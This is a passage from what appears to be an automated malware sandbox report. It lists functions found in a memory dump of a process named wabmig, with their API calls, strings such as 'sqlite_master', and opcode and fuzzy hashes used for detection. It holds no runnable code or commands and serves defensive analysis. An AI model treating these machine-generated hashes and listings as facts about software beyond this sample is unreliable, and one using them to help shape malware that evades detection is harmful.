                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                            • wcslen.MSVCRT ref: 00410C74
                                                                            • _wtoi.MSVCRT(?), ref: 00410C80
                                                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                            • String ID:
                                                                            • API String ID: 1549203181-0
                                                                            • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                            • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                            Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00412057
                                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                            • String ID:
                                                                            • API String ID: 3550944819-0
                                                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                            Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • free.MSVCRT ref: 0040F561
                                                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$free
                                                                            • String ID: g4@
                                                                            • API String ID: 2888793982-2133833424
                                                                            • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                            • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                            Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                            • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: @
                                                                            • API String ID: 3510742995-2766056989
                                                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                            Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                            • memset.MSVCRT ref: 0040AF18
                                                                            • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@memcpymemset
                                                                            • String ID:
                                                                            • API String ID: 1865533344-0
                                                                            • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                            • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                            • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                            • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                            Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004144E7
                                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                            • memset.MSVCRT ref: 0041451A
                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                            • String ID:
                                                                            • API String ID: 1127616056-0
                                                                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                            Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                            • memset.MSVCRT ref: 0042FED3
                                                                            • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID: sqlite_master
                                                                            • API String ID: 438689982-3163232059
                                                                            • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                            • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                            • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                            • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                            Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                            • wcscpy.MSVCRT ref: 00414DF3
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3917621476-0
                                                                            • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                            • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                            • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                            • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                            Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                            • _snwprintf.MSVCRT ref: 00410FE1
                                                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                            • _snwprintf.MSVCRT ref: 0041100C
                                                                            • wcscat.MSVCRT ref: 0041101F
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                            • String ID:
                                                                            • API String ID: 822687973-0
                                                                            • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                            • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                            • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                            • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                            Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,774CDF80,?,0041755F,?), ref: 00417452
                                                                            • malloc.MSVCRT ref: 00417459
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,774CDF80,?,0041755F,?), ref: 00417478
                                                                            • free.MSVCRT ref: 0041747F
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                            • String ID:
                                                                            • API String ID: 2605342592-0
                                                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                            Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                            • RegisterClassW.USER32(?), ref: 00412428
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                                            • String ID:
                                                                            • API String ID: 2678498856-0
                                                                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                            Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Item
                                                                            • String ID:
                                                                            • API String ID: 3888421826-0
                                                                            • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                            • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                            • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                            • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                            Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00417B7B
                                                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                            • GetLastError.KERNEL32 ref: 00417BB5
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$ErrorLastLockUnlockmemset
                                                                            • String ID:
                                                                            • API String ID: 3727323765-0
                                                                            • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                            • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                            • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                            • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                            Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040F673
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                            • strlen.MSVCRT ref: 0040F6A2
                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2754987064-0
                                                                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                            Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040F6E2
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                            • strlen.MSVCRT ref: 0040F70D
                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2754987064-0
                                                                            • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                            • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                            Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00402FD7
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                            • strlen.MSVCRT ref: 00403006
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2754987064-0
                                                                            • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                            • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                            • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                            • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                            Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                            • String ID:
                                                                            • API String ID: 764393265-0
                                                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                            Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Time$System$File$LocalSpecific
                                                                            • String ID:
                                                                            • API String ID: 979780441-0
                                                                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                            Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                            • String ID:
                                                                            • API String ID: 1386444988-0
                                                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                            Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                            Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateMessageRectSend
                                                                            • String ID: d=E
                                                                            • API String ID: 909852535-3703654223
                                                                            • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                            • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                            • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                            • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                            Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcschr.MSVCRT ref: 0040F79E
                                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
